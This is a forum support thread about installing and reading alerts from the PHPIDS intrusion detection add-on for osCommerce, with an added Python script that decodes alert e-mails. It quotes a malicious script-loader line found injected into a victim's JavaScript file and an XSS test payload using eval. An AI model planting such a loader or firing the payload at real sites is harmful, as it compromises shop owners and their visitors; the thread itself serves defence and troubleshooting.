celextel

PHP Intrusion Detection System for osCommerce

Hello, I just found a virus on my site:

 

includes/general.js

line 192

document.write('<s'+'cript type="text/javascript" src="http://gopakgyo.playmateswcc.com:8080/CAD.js"></scr'+'ipt>');

 

and so on, more than 20 files infected; the security mod will not prevent this.

 

PHPIDS does not protect you from intrusions or viruses. It only warns you when an intrusion takes place. It would also not detect any virus on your system. You need to scan your website for viruses with a virus scanner provided by your host or with another osCommerce module for detecting viruses.

 

Please leave your suggestion in regard to this [virus detection] in the PHPIDS forum at the following URL:

http://php-ids.org/forum/


Yes, I mean I didn't get any warning message. I have already opened a thread on your forum.


You need to change your passwords for FTP and osCommerce Admin immediately. Someone seems to have gained access to your files through FTP or osC Admin [if you have a file manager there] and injected that code. PHPIDS detects only those intrusions which take place through your website catalog URL via the query string. It would also not detect virus code already present in the files.


Thanks celextel for understanding; I have already put the site offline and changed the FTP password. We are cleaning all infected files but I need to find a solution, I'll contact you by PM.


Hi, is it possible for PHPIDS to push server usage over 20%? I only ask because my website got disabled for a few minutes because of this. I also got an intrusion email....

 

The following attack has been detected by PHPIDS

 

 

Date: 2010-07-12T18:24:49-05:00

Impact: 10

Affected tags: xss csrf

Affected parameters: REQUEST.image=%3A%3A%3A%3A%3A%3A%3A%3A%3A%3Aget_product_image.php%3Fid%3DHDREXTFUJIEXT1TBa.jpg%3A%3Aget_product_image.php%3Fid%3DSamsungTS-H353B_250.jpg%3A%3A%3A%3Aget_product_image.php%3Fid%3Dzm-f3120.jpg%3A%3Aget_product_image.php%3Fid%3DGCD-SPH-HD3450.jpg%3A%3Aget_product_image.php%3Fid%3DLiteOnIHAS524-32_250.jpg%3A%3Aget_product_image.php%3Fid%3DHDAV_small.jpg%3A%3Aget_product_image.php%3Fid%3DNET-WLAPCI-TLWN350G-2130.jpg%3A%3Aget_product_image.php%3Fid%3DGCT-S800F.jpg%3A%3Aget_product_image.php%3Fid%3D3d-avatar.jpg%3A%3Aget_product_image.php%3Fid%3Dx4-xl.jpg%3A%3Aget_product_image.php%3Fid%3Dslimbladeblack.jpg%3A%3Aget_product_image.php%3Fid%3DSPK-2P1.jpg%3A%3Aget_product_image.php%3Fid%3Dcyborgx.jpg%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A, POST.image=%3A%3A%3A%3A%3A%3A%3A%3A%3A%3Aget_product_image.php%3Fid%3DHDREXTFUJIEXT1TBa.jpg%3A%3Aget_product_image.php%3Fid%3DSamsungTS-H353B_250.jpg%3A%3A%3A%3Aget_product_image.php%3Fid%3Dzm-f3120.jpg%3A%3Aget_product_image.php%3Fid%3DGCD-SPH-HD3450.jpg%3A%3Aget_product_image.php%3Fid%3DLiteOnIHAS524-32_250.jpg%3A%3Aget_product_image.php%3Fid%3DHDAV_small.jpg%3A%3Aget_product_image.php%3Fid%3DNET-WLAPCI-TLWN350G-2130.jpg%3A%3Aget_product_image.php%3Fid%3DGCT-S800F.jpg%3A%3Aget_product_image.php%3Fid%3D3d-avatar.jpg%3A%3Aget_product_image.php%3Fid%3Dx4-xl.jpg%3A%3Aget_product_image.php%3Fid%3Dslimbladeblack.jpg%3A%3Aget_product_image.php%3Fid%3DSPK-2P1.jpg%3A%3Aget_product_image.php%3Fid%3Dcyborgx.jpg%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A%3A,

Request URI: %2Fcatalog%2Fbuilder_main.php%3Faction%3Dadd_products

Origin: 174.36.208.130

 

I was testing out a feature in my store and I'm not sure if there is an issue with the feature itself.

 

Thanks

Edited by pctekcomponents


We have been using PHPIDS in 5 of our websites and we have not noticed any push to server usage. This should be due to some other factor.

 

The reported intrusion seems to be of the feature which you were trying to test.

 

You could add these variables [REQUEST.image, POST.image] as Variable Exclusions, if required.


Thanks Celextel. It turns out that Custom Product Builder doesn't appreciate " in any product descriptions.

Is there any info on interpreting PHPIDS results? Any time I get a detection I have no idea what I'm looking at.

For example, I got this intrusion notification a little while ago....

 

IP: 109.224.137.123

Date: 2010-07-20T15:16:53-05:00

Impact: 66

Affected tags: xss csrf id rfe lfi

Affected parameters: REQUEST.s_vi_zmxxkhx7Faezy=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, REQUEST.s_vi_x7Blyjilgdijg=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, REQUEST.s_vi_wx60uferl=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, COOKIE.s_vi_zmxxkhx7Faezy=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, COOKIE.s_vi_x7Blyjilgdijg=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D, COOKIE.s_vi_wx60uferl=%5BCS%5Dv4%7C42FE2B6900003E30-A000A6D00000001%7C42FE2B68%5BCE%5D,

Request URI: %2Fcatalog%2Fsumvision-cyclone-1080p-media-player-hdmi-network-media-p-11303.html

Origin: 174.36.208.130

 

I'm really not sure what any of the above means.


Interpreting PHPIDS results is not easy. You could go through the PHPIDS forum in regard to this.

 

This seems to be an attack. You could verify the IP and ban it.

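A decoder for these notification e-mails, added here as an example (it is not code from the PHPIDS project, the osCommerce module or anyone in this thread). The report text is a constructed sample modelled on the format quoted above, with invented values and documentation IP addresses; the decoder also attributes each flagged REQUEST.* entry to the GET, POST or COOKIE twin it was copied from, since PHP's $_REQUEST merges those arrays.

```python
"""Decode a PHPIDS intrusion notification of the kind the osCommerce module e-mails.

Added example, not code from the PHPIDS project or the osCommerce module.
"""
import re
from urllib.parse import unquote

# Constructed sample modelled on the notifications quoted in the thread;
# parameter values are invented and the IPs are documentation addresses.
SAMPLE_REPORT = """\
The following attack has been detected by PHPIDS

IP: 203.0.113.5
Date: 2010-07-20T15:16:53-05:00
Impact: 66
Affected tags: xss csrf id rfe lfi
Affected parameters: REQUEST.s_vi_abc=%5BCS%5Dv4%7C42FE2B69%7C42FE2B68%5BCE%5D, COOKIE.s_vi_abc=%5BCS%5Dv4%7C42FE2B69%7C42FE2B68%5BCE%5D, REQUEST.image=get_product_image.php%3Fid%3Dcyborgx.jpg, POST.image=get_product_image.php%3Fid%3Dcyborgx.jpg,
Request URI: %2Fcatalog%2Fsumvision-cyclone-p-11303.html
Origin: 198.51.100.7
"""

# One entry of the "Affected parameters" list: SCOPE.name=url-encoded-value
PARAM_RE = re.compile(r"^(REQUEST|GET|POST|COOKIE)\.([^=]+)=(.*)$")


def parse_report(text):
    """Return the header fields and the URL-decoded parameters of one notification."""
    fields = {}
    for line in text.splitlines():
        if ": " in line:                      # "Key: value" header lines
            key, value = line.split(": ", 1)
            fields[key.strip()] = value.strip()
    params = []
    for item in fields.get("Affected parameters", "").split(","):
        match = PARAM_RE.match(item.strip())
        if match:                              # skips the empty trailing item
            scope, name, encoded = match.groups()
            params.append({"scope": scope, "name": name, "value": unquote(encoded)})
    return {
        "impact": int(fields.get("Impact", "0")),
        "tags": fields.get("Affected tags", "").split(),
        "request_uri": unquote(fields.get("Request URI", "")),
        "client_ip": fields.get("IP", ""),      # the visitor that sent the request
        "server_ip": fields.get("Origin", ""),  # "origin" records the server IP
        "params": params,
    }


def attribute_sources(params):
    """Map each flagged REQUEST.* entry to the array it was copied from.

    PHP's $_REQUEST merges $_GET, $_POST and $_COOKIE, so PHPIDS reports the
    same value twice; the GET/POST/COOKIE twin says where it really came from.
    """
    specific = {(p["name"], p["value"]): p["scope"]
                for p in params if p["scope"] != "REQUEST"}
    return {p["name"]: specific.get((p["name"], p["value"]), "REQUEST only")
            for p in params if p["scope"] == "REQUEST"}


if __name__ == "__main__":
    report = parse_report(SAMPLE_REPORT)
    print("impact", report["impact"], "tags", report["tags"], "uri", report["request_uri"])
    for p in report["params"]:
        print(f"{p['scope']}.{p['name']} = {p['value']!r}")
    print("sources:", attribute_sources(report["params"]))
```

Paste a real notification in place of the sample to see the decoded cookie or POST values and which array each flagged REQUEST entry actually arrived in.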

Hi,

 

I have tried to install phpids version 1.6; however, the install file mentions files which are not in 1.6.

 

I went and got 1.4 and 1.5 and the files are not in there either.

 

All packages say the zip is a full package.

 

Can we have an install file that is relevant for 1.6 please, as we would like to install it.

 

Thank you

 

oz :-)


You need to install the latest one. It has all the files.

 

Please let us know exactly which of the files is not in that package.


Thank you for the reply.

 

These are the files in the latest package; however, the install file mentions other files.

 

Regards,

 

oz :-)

 

 

In /phpidsPHPIDS_for_oscommerce_1_6/ directory

Read_Me.htm
banned.php
GPL.txt

and these dirs..

/admin/
  banned_ip.php
  phpids_installer.php
  phpids_report.php

/admin/includes/
  /functions/
    version_checker.php
  /languages/
    /english/
      banned_ip.php
      phpids_report.php
      version_checker.php

/cache/
  index.php

/includes/
  /modules/
    banned_ip.php
    osc_phpids.php


You need to Download "PHPIDS 0.6.4 (ZIP)" or the latest version at:

http://php-ids.org/downloads/

 

Please let us know exactly as to which of the files are missing other than this one.


HI,

 

Okay I did get the files from the main PHPIDS site above and they are very different from what is at the osc addon contrib site.

 

Anyway, this 0.64 has the dirs ..

 

docs/ libs/ test/

 

Now, before I install these, should I delete everything I installed before, e.g. the dirs and files I mention above, and start anew?

 

Thanks

 

 

oz :-)


You need to install both [core files from PHPIDS website and module files from the add-on section] as mentioned in our Read Me file. Please go through that file carefully and do the installation as mentioned therein.


I hope to get this working soon. I downloaded 1.6, along with PHPIDS 0.6.4

 

The first phase of the install went perfectly -- got the tables creation confirmation, OSC admin panel has all appropriate Configuration and Tools entries. I left all settings completely default.

 

Then I uploaded the new and changed files for the catalog.

 

After I set "Show Intrusion Result" to true so that I could test the installation, I tried both intrusion examples.

 

Both times I got the following message:

 

Exception: 23000, 1048, Column 'origin' cannot be null

 

When I went to the admin panel to check the log -- no entries.

 

I've gone over the instructions to make sure I did everything correctly 4 times; CHMOD was done right when I uploaded - rechecked; checked my database - new tables are there.

 

Any suggestions would be immensely appreciated. I don't have any idea where to chase this.


The "phpids_intrusions" db table has a column named "origin" to record the server IP automatically. It is unable to do this. You need to enable error handling and find out why this is not happening.

 

If you are unable to find out a solution to this, please make the "Null" for this column as "Yes" in this table in your MySQL DB through phpMyAdmin.

If you are unable to find out a solution to this, please make the "Null" for this column as "Yes" in this table in your MySQL DB through phpMyAdmin.

 

My error handling is set to ALL. I reset the error log so that I can see specifically what today's problem is.

 

When I attempted the test URLs from the ReadMe, I was of course still getting the error previously mentioned, so I set origin to Null.

 

Now at the top of my page, I get:

------------------------------

Total impact: 8

Affected tags: xss, csrf

 

Variable: REQUEST.test | Value: \">XXX

Impact: 4 | Tags: xss, csrf

Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1

 

Variable: GET.test | Value: \">XXX

Impact: 4 | Tags: xss, csrf

Description: finds html breaking injections including whitespace attacks | Tags: xss, csrf | ID: 1

 

 

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /[snip]/includes/modules/osc_phpids.php:199) in /[snip]/includes/functions/sessions.php on line 102

------------------------------

followed by the rest of my page just like normal.

 

 

Still have NOTHING in the error log.

 

Thank you for helping me out with this. I really appreciate it.


Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /[snip]/includes/modules/osc_phpids.php:199) in /[snip]/includes/functions/sessions.php on line 102

 

We do not know as to why you were getting this error message.

 

You need to enable error logging into your hosting account. If you are unable to do this yourself, you have to request your hosting provider to do this.


By going in through phpMyAdmin and manually changing the origin row to null as follows:

 

origin varchar(15) latin1_swedish_ci Yes NULL

 

I was able to get this to work.

 

However for the second test: ?test="><script>eval(window.name)</script>

 

When I run this I get

Forbidden

You don't have permission to access page_name.html on this server


I am not a professional webmaster or PHP coder by background or training but I will try to help as best I can.

I remember what it was like when I first started with osC. It can be overwhelming.

However, I strongly recommend considering hiring a professional for extensive site modifications, site cleaning, etc.

There are several good pros here on osCommerce. Look around, you'll figure out who they are.


>> Anti XSS [XSS Shield]

PHPIDS would not work fully if you use this as some of the query strings get sanitized.

You do not require this if you use Security Pro as both of them have almost same functions.

 

I want to make sure I follow the logic on this. With Anti XSS [XSS Shield]installed, that code would stop the intrusion and redirect to a 403 page, but also stop the code short of allowing PHPIDS to function, do I have that correct?

 

With Anti XSS [XSS Shield] removed, PHPIDS will then process an injection, do its job but in at least some cases, the script would still run in application_top.php and allow Security Pro to sanitize the string as well. Is that accurate?

 

Thanks much.




We do not have a file named page_name.html in our module. You need to find out which module is using this file. Perhaps some other contribution may be interfering with our contribution.

You are correct.

 

PHPIDS creates a log about an intrusion when it occurs. Anti XSS codes do not allow this to happen. You could have Security Pro in lieu of Anti XSS.

Since posting my observation I removed XSS [XSS Shield] and reran test 2. That error page I asked about disappeared on the second run; and the module functioned as it was supposed to. Thanks much.



Hello, with Anti XSS removed now from my system and Security Pro installed as per instructions in PHPIDS read me, all appears OK.

 

However, I have noticed that when I run Site Monitor, there are 18 files that keep recurring in the report even after I delete the Site Monitor reference file.

 

The recurring files are located in these directories:

 

includes/phpids/lib/IDS/tmp/

includes/phpids/lib/IDS/vendors/

 

I found I can get them to stop appearing in the Site Monitor report if I exclude them in the configure part of Site Monitor, but I thought I'd mention the situation for discussion sake. I am presuming there is something dynamic about these files that make them constantly change, perhaps that's how they work.

 

Thanks for your assistance.



includes/phpids/lib/IDS/tmp/

includes/phpids/lib/IDS/vendors/

 

Yes, you have to add these directories in Site Monitor under exclusions. We are also using Site Monitor.
